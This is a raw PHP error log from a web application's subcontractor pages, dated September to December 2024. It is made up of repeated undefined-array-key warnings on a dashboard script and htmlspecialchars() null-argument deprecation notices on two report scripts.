PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [29-Sep-2024 05:16:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [29-Sep-2024 22:22:28 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [29-Sep-2024 23:35:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [29-Sep-2024 23:42:19 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 01:58:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 03:12:53 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 04:27:30 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 05:35:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 05:40:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 06:02:10 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 07:15:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 08:00:03 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 11:19:09 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [30-Sep-2024 23:26:37 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 01:42:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 02:39:20 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 02:42:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 03:32:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 03:47:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 04:17:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 04:41:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 05:32:31 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 06:11:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 07:22:14 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 08:38:27 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 11:31:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [01-Oct-2024 23:23:23 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 00:02:00 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 02:07:05 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 02:07:20 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 02:08:35 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 02:10:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 02:13:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 02:57:18 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 03:00:22 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 03:01:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 03:01:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 03:04:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 03:10:48 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 03:49:25 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 04:27:35 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 04:31:15 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 04:59:57 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 05:53:12 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 06:38:55 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 08:39:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 08:41:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 23:29:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 23:30:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [02-Oct-2024 23:30:39 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 00:04:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 00:12:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 00:13:03 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 00:48:14 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 01:24:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 01:28:42 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 01:36:10 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 01:48:48 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 01:49:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 02:04:20 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 02:07:19 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 02:40:35 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 04:24:01 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 04:32:19 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 05:23:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 05:43:21 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 06:33:20 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 06:42:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 08:02:04 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 08:07:54 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 10:16:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 11:16:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 11:19:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 12:11:17 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 23:36:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [03-Oct-2024 23:39:57 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 01:12:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 01:31:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 01:50:28 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 02:22:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 02:26:47 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 02:41:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 02:41:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 02:52:02 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 02:58:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 03:39:56 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 05:14:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 05:27:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 05:46:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 06:28:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 06:36:19 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 06:39:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 07:36:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 08:07:02 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 08:41:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 09:30:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 10:37:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 10:37:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [04-Oct-2024 10:39:14 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [06-Oct-2024 03:58:39 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 01:20:30 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 01:56:18 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 02:15:17 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 02:39:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 02:43:28 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 12:25:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 12:25:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 12:26:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 12:26:34 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 12:27:03 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [07-Oct-2024 23:14:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [08-Oct-2024 00:52:39 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Oct-2024 05:34:10 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [18-Oct-2024 01:24:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [19-Oct-2024 04:16:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [19-Oct-2024 04:29:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [21-Oct-2024 04:56:54 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Oct-2024 03:25:18 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Oct-2024 03:29:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Oct-2024 03:38:09 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Oct-2024 03:38:15 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Oct-2024 06:58:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [28-Oct-2024 00:26:47 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [06-Nov-2024 14:05:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Nov-2024 14:06:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Nov-2024 14:07:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Nov-2024 14:10:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [06-Nov-2024 14:10:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [06-Nov-2024 14:10:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Nov-2024 14:11:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Nov-2024 14:13:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [06-Nov-2024 14:13:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [06-Nov-2024 23:23:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [26-Nov-2024 00:28:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [26-Nov-2024 00:31:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [26-Nov-2024 00:43:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [26-Nov-2024 00:44:03 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [26-Nov-2024 00:44:03 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [26-Nov-2024 00:44:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [26-Nov-2024 00:44:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [26-Nov-2024 00:44:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [26-Nov-2024 00:44:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [26-Nov-2024 03:36:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [26-Nov-2024 03:40:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [02-Dec-2024 04:29:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [02-Dec-2024 04:29:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [02-Dec-2024 04:29:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [02-Dec-2024 04:29:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [02-Dec-2024 04:30:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [02-Dec-2024 04:30:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [02-Dec-2024 04:30:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [02-Dec-2024 04:30:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [03-Dec-2024 08:25:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [03-Dec-2024 08:25:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [03-Dec-2024 08:25:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [03-Dec-2024 08:26:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [03-Dec-2024 08:26:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [03-Dec-2024 08:28:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [03-Dec-2024 08:28:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [03-Dec-2024 08:28:13 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [03-Dec-2024 08:28:13 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [03-Dec-2024 08:28:29 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [03-Dec-2024 08:28:29 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [03-Dec-2024 08:39:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [03-Dec-2024 08:40:54 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [03-Dec-2024 08:40:54 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [05-Dec-2024 04:39:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Dec-2024 04:39:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [05-Dec-2024 04:39:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [05-Dec-2024 04:39:18 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [05-Dec-2024 04:39:18 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [05-Dec-2024 04:39:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [05-Dec-2024 04:39:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [05-Dec-2024 11:09:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Dec-2024 00:31:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Dec-2024 00:31:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Dec-2024 00:32:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Dec-2024 00:33:42 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [06-Dec-2024 00:33:42 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [06-Dec-2024 00:34:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [06-Dec-2024 00:34:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [06-Dec-2024 00:43:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Dec-2024 09:57:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Dec-2024 09:57:41 